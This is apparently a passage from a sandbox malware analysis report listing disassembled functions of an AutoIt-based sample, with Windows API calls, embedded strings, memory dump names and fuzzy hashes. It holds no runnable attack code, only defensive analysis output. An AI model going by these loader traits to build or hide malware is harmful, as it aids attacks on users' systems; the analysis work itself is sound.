GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E0F9CD
OleInitialize.OLE32(00000000), ref: 00E0FA4A
CloseHandle.KERNEL32(00000000), ref: 00E445C8

Strings

\T, xrefs: 00E0F7F7
S, xrefs: 00E0F7EB
%, xrefs: 00E0F796, 00E0F7A8, 00E0F96E, 00E0FA51
<W, xrefs: 00E0F930

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W$\T$%$S
API String ID: 1986988660-191198415
Opcode ID: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
Instruction ID: a66109b996b1257448f377e2d8c33e3ce25e792e097450120c235c9dafb826fe
Opcode Fuzzy Hash: f4f77fce6977ec5af08dc4ac72aea2b535ae4bbc3b6568ff923f7feb18a40fdd
Instruction Fuzzy Hash: 6681CFB2905B40CFC388DF2AA941E597BE5FB98306750913ED02AF7261E77264CB8F11

Function 0157D750 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0157D795

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 451e208972c08c6e60e881077f388e9b6580cda9af215a88a1e253b030fe49e9
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 78510775A10209FBEB20DFE4DC4AFEE77B8BF48700F108954F60AEE180DA7496448B60

Function 00E039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E03A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E03A24
ShowWindow.USER32(00000000,?,?), ref: 00E03A38
ShowWindow.USER32(00000000,?,?), ref: 00E03A41

Strings

edit, xrefs: 00E03A1E
AutoIt v3, xrefs: 00E039FB, 00E03A00, 00E03A01

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
Instruction ID: 0479a126abba4d8ffe7be4fd4c6a95d4f69d7c190c43a64db7690fc4e963f133
Opcode Fuzzy Hash: ad4a961119ebd6bdb1229390d6cbcea1ca6d40ae2a127df0cfbef24d416bd14f
Instruction Fuzzy Hash: 01F0DA725416907EEB355727AC49E6B2EBDD7C6F50B00413EF908B2170C6762896DAB0

Function 00E0407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E3D3D7

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

_memset.LIBCMT ref: 00E040FC
_wcscpy.LIBCMT ref: 00E04150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160

Strings

Line: , xrefs: 00E3D400

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: f2467cde8d039f72dc2dabb58e87581d9dfa989d7ba82bf86138ab2fa5bb5bf7
Instruction ID: 7667f7aa47d475aec4423dce2dd39a6733844637f5074891fccf7eed7b647a49
Opcode Fuzzy Hash: f2467cde8d039f72dc2dabb58e87581d9dfa989d7ba82bf86138ab2fa5bb5bf7
Instruction Fuzzy Hash: D731B2B2408305AED324EB60DC45FDB77E8AF54304F10652EF685B20E1DB70A6C9CB92

Function 00E2541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00E2547B
_memcpy_s.LIBCMT ref: 00E254ED
__read_nolock.LIBCMT ref: 00E2554B
__filbuf.LIBCMT ref: 00E2556E
_memset.LIBCMT ref: 00E255B2

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 24377278f5ade330d8e725cfae4f9a625c6a4b1b3fb7b8fd32cbc36a9d4078ae
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 5E51CC72A00B25DBCB249F69FE445AEB7B6AF40325F249729F836B62D0D770DD508B40

Function 00E0686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00E04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E0F

_free.LIBCMT ref: 00E3E263
_free.LIBCMT ref: 00E3E2AA

Part of subcall function 00E06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E06BAD

Strings

Bad directive syntax error, xrefs: 00E3E292
>>>AUTOIT SCRIPT<<<, xrefs: 00E3E039

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 106eb5f665e847dc8c28add0ec2d0972247ff1faef9c4c8f00e373526f38484e
Instruction ID: 1dc4c04619a657bcc2c1f38d24b30a796b34310601bbb0e361237ee990f05eda
Opcode Fuzzy Hash: 106eb5f665e847dc8c28add0ec2d0972247ff1faef9c4c8f00e373526f38484e
Instruction Fuzzy Hash: 14916C71910219AFCF08EFA4DC959EEBBB8FF04314F10642AE815BB2E1DB70A955CB50

Function 0157F270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0157F160: Sleep.KERNELBASE(000001F4), ref: 0157F171

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0157F361

Strings

AFL4CQ790VJRC, xrefs: 0157F3E1, 0157F3E4

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: CreateFileSleep
String ID: AFL4CQ790VJRC
API String ID: 2694422964-1749777383
Opcode ID: 53a5d81a432a9e6cbcc5c9bdace4a478ab0a960b4893bb46f66e967b084f1ca3
Instruction ID: 538713102a733b3a85db374435cb5453f81ac9dce84aa00c0ebd896422dda68b
Opcode Fuzzy Hash: 53a5d81a432a9e6cbcc5c9bdace4a478ab0a960b4893bb46f66e967b084f1ca3
Instruction Fuzzy Hash: 6F51A331D0424ADBEF11DBA4D815BEFBBB9AF54300F004599E618BB2C0DBB91B45CBA5

Function 00E035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E035A1,SwapMouseButtons,00000004,?), ref: 00E035D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E035F5
RegCloseKey.KERNELBASE(00000000,?,?,00E035A1,SwapMouseButtons,00000004,?,?,?,?,00E02754), ref: 00E03617

Strings

Control Panel\Mouse, xrefs: 00E035D2

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
Instruction ID: c9434271407363e0fde87fcafb8e679271f678304c5e6708ed28de990b04d98d
Opcode Fuzzy Hash: a52133278c297e70007e502c9e9a6a06f44d8edc1a97b3d846124192c60d125a
Instruction Fuzzy Hash: 4F114871510208BFDB20CF65EC409EEB7BCEF14744F1054A9E809E7250D6729E849760

Function 00E6955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD

Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837

_free.LIBCMT ref: 00E696A2
_free.LIBCMT ref: 00E696A9
_free.LIBCMT ref: 00E69714

Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B

_free.LIBCMT ref: 00E6971C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 44dfca6dc25fa1f38ef9ce382799c4e584f3c8112b9c323177094e31bdc8dccb
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 88514CF1904219ABDF259FA4DC81A9EBBB9EF48300F10549EF209B7281DB715A90CF58

Function 00E2470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E247A0
__flush.LIBCMT ref: 00E247C0
__write.LIBCMT ref: 00E247F3
__flsbuf.LIBCMT ref: 00E24821

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: ba661823098bbd3f6f353be9af080e2816af7f7338e9528758d843e406acaac0
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 9241D7B5B007659BDB1CCF69E8809AE7BA5EF45364B24913EF825E76C0DB70DD408B40

Function 00E04C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E04CBA

Strings

EA06, xrefs: 00E3D8CC
AU3!P/, xrefs: 00E04CB4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/$EA06
API String ID: 4104443479-182974850
Opcode ID: 3746b5864aeba6325ab45d34d78bb4aa15fc14ac3f10e8089b780c445f2d87f9
Instruction ID: fd417be1d21b28735132d1adb3827b56b50e769399a31e7b53cd36fa3e5a4a67
Opcode Fuzzy Hash: 3746b5864aeba6325ab45d34d78bb4aa15fc14ac3f10e8089b780c445f2d87f9
Instruction Fuzzy Hash: 8941ACE2A0425867DF219B54DE917FE7FE29B55304F287065EE82BB2C2D6309DC183A1

Function 00E07285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E3EA39
GetOpenFileNameW.COMDLG32(?), ref: 00E3EA83

Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770

Part of subcall function 00E20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0

Strings

X, xrefs: 00E3EA51

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
Instruction ID: 58f02a45807fb9168d74228da403860e293de08d604c2da9758265f674d033a8
Opcode Fuzzy Hash: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
Instruction Fuzzy Hash: 4921C071A00258ABCB01DF94D846BEE7BFDAF48314F00505AE548BB381DBB46989CFA1

Function 00E68D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E68DAC
__fread_nolock.LIBCMT ref: 00E68DC1

Strings

EA06, xrefs: 00E68DF3

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 4b6bd844789ac00e45c5c625c520650460fc5f5e881d4dd66e2999d8cbeb1dd6
Instruction ID: 845ab6b4a1aadc2829858d353262cc1b15d6f745eb3e62177effb91e5f1470f3
Opcode Fuzzy Hash: 4b6bd844789ac00e45c5c625c520650460fc5f5e881d4dd66e2999d8cbeb1dd6
Instruction Fuzzy Hash: F701F9728442287EDB18CAA8D816EFE7BFCDB11311F00419AF552E2181E874E6048760

Function 0157DE30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0157DE75
ExitProcess.KERNEL32(00000000), ref: 0157DE94

Strings

D, xrefs: 0157DE41

Memory Dump Source

Source File: 00000000.00000002.2355105121.000000000157C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0157C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157c000_CvzLvta2bG.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: eaefe38700dea64172a30051a10e55a487822181055063bbb51e2642d874e9cd
Instruction ID: 93fdcc6906d0b0cd4ab863fc15c35c3df2febc5e7d844ada51cb8efd16042666
Opcode Fuzzy Hash: eaefe38700dea64172a30051a10e55a487822181055063bbb51e2642d874e9cd
Instruction Fuzzy Hash: 76F0FFB554024DABDB60EFE4CC49FEE777CBF44705F008909FB1A9B184DA7496088B61

Function 00E698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00E698F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E6990F

Strings

aut, xrefs: 00E69909

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
Instruction ID: a059de75ae4bb9bcac9f0b60529d6bbb394e36f6dcf4ce6d92c7bcbc7bd15350
Opcode Fuzzy Hash: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91

Function 00E7CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
Instruction ID: 3150a5d71c427d41e779deeb5f71a24d7a4518af8e997c366895249a3f1a3839
Opcode Fuzzy Hash: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
Instruction Fuzzy Hash: 86F13C716083019FC714DF28C484A6ABBE9FF88314F54992EF999AB352D730E945CF82

Function 00E0434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E04370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E04432

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 3f1984e16922c70ecf6e4390650ebdc599566f7ccbaba50987c6edd6cb4884fa
Instruction ID: 4e3c89285ce63a9db1651f287fef464d4a9b4149f38347da2e2dbda73074aa4e
Opcode Fuzzy Hash: 3f1984e16922c70ecf6e4390650ebdc599566f7ccbaba50987c6edd6cb4884fa
Instruction Fuzzy Hash: 0231A0F15047018FD725DF64D984A9BBBF8FB58308F00192EF69AA22D1D771A988CB52

Function 00E2571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00E25733

Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A192
Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A19C

__NMSG_WRITE.LIBCMT ref: 00E2573A

Part of subcall function 00E2A1C8: GetModuleFileNameW.KERNEL32(00000000,00EC33BA,00000104,?,00000001,00000000), ref: 00E2A25A
Part of subcall function 00E2A1C8: ___crtMessageBoxW.LIBCMT ref: 00E2A308

Part of subcall function 00E2309F: ___crtCorExitProcess.LIBCMT ref: 00E230A5
Part of subcall function 00E2309F: ExitProcess.KERNEL32 ref: 00E230AE

Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28

RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
Instruction ID: 11e0b9146feb3e64d26a0387b046f1b71068b7b4a0c2f84f3d6452f4418714b7
Opcode Fuzzy Hash: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
Instruction Fuzzy Hash: 9701F576281B31DFDA142735FD42A6E73C89B82765F10243BF415BB191DE708D014661

Function 00E698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

